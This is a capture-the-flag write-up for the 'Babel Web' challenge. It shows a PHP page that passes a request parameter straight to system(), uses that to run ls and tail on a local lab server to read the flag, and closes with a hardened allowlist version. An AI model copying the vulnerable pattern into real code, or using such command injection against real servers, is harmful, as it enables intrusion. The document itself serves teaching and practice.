Writeup by JMLF for Babel Web

intro web

December 25, 2023

First of all, get and run the Docker file:

This sets up and runs a small web server on your machine. You can now open the server's address in your browser: http://localhost:8000.

The page shows a message:

Bienvenue à Babel Web!
La page est en cours de développement, merci de revenir plus tard.

By inspecting the elements, you notice an HTML link that has been commented out: <!-- <a href="?source=1">source</a> -->. Uncomment this line by removing the <!-- and -->.

A link appears on the web page: "La page est en cours de développement, merci de revenir plus tard. source". Click on 'source'.

Your URI is now http://localhost:8000/?source=1, and the PHP source of the page is visible:

<?php
    if (isset($_GET['source'])) {
        // ?source=... : print this file's own source code
        @show_source(__FILE__);
    } elseif (isset($_GET['code'])) {
        print("<pre>");
        // ?code=... : the raw request parameter is handed to a shell, unfiltered
        @system($_GET['code']);
        print("<pre>");   // the challenge prints a second <pre> instead of closing the first one
    } else {
?>
<!-- else branch: the welcome page shown without parameters (reconstructed from what the browser displays) -->
<p>Bienvenue à Babel Web!<br>
La page est en cours de développement, merci de revenir plus tard.</p>
<!-- <a href="?source=1">source</a> -->
<?php } ?>

This PHP snippet performs different actions depending on the query parameters present in the URI. If the URL contains a 'source' query parameter (like ?source=something), it executes @show_source(__FILE__);, which prints the file's own source. If a 'code' parameter is set in the URL (like ?code=command), it passes the value straight to the system() function, which runs it as a shell command on the server and prints whatever the command outputs.

Beautiful RCE.

You can try http://localhost:8000/?code=ls, which executes the ls command on the server and displays the output inside the <pre> element:

flag.php
index.php

The flag is here: you can read the flag file either with the /?code RCE or with /?source.

The link http://localhost:8000/?code=tail%20flag.php uses the tail command (cat works too) to output the file. Because the browser parses the <?php opening tag as a bogus comment that runs up to the next >, and the page never closes its <pre>, the inspector shows the result as:

<!--?php
	$flag = "FCSC{5d969396bb5592634b31d4f0846d945e4befbb8c470b055ef35c0ac090b9b8b7}";
<pre-->
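For comparison, here is a hardened counterpart to the challenge's index.php, written as an added example (it is not the challenge's code): the request parameter only selects a name from a fixed allowlist, the argv that runs is hard-coded, the output is escaped, and there is no source-dump handler at all. The /bin paths and the action names are assumptions for illustration.

```php
<?php
// Hardened counterpart of the challenge's index.php. Added example, not the
// challenge's own code; paths and action names are assumed for illustration.
// The request parameter only selects an entry of a fixed allowlist; the argv
// that is executed is hard-coded, and there is no ?source= handler at all.
declare(strict_types=1);

const ACTIONS = [
    // action name => argv (program plus fixed arguments)
    'list' => ['/bin/ls', '-l', '/var/www/html/public'],
    'date' => ['/bin/date', '-u'],
];

function run_action(string $name): ?string
{
    if (!array_key_exists($name, ACTIONS)) {
        return null;   // unknown action: refuse, nothing from the request is executed
    }
    // Passing an array to proc_open() (PHP >= 7.4) starts the program directly,
    // without /bin/sh, so shell metacharacters are never interpreted.
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(ACTIONS[$name], $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

if (!isset($_GET['action'])) {
    echo '<p>Bienvenue à Babel Web!</p>';
} else {
    $out = run_action((string) $_GET['action']);
    if ($out === null) {
        http_response_code(400);
        echo '<p>Unknown action.</p>';
    } else {
        // Escape the output so command results cannot inject markup, and close the <pre>.
        echo '<pre>' . htmlspecialchars($out, ENT_QUOTES, 'UTF-8') . '</pre>';
    }
}
```

With this layout, a request such as ?action=tail%20flag.php simply gets a 400, because "tail flag.php" is not a key of the allowlist and no part of the request is ever interpreted by a shell.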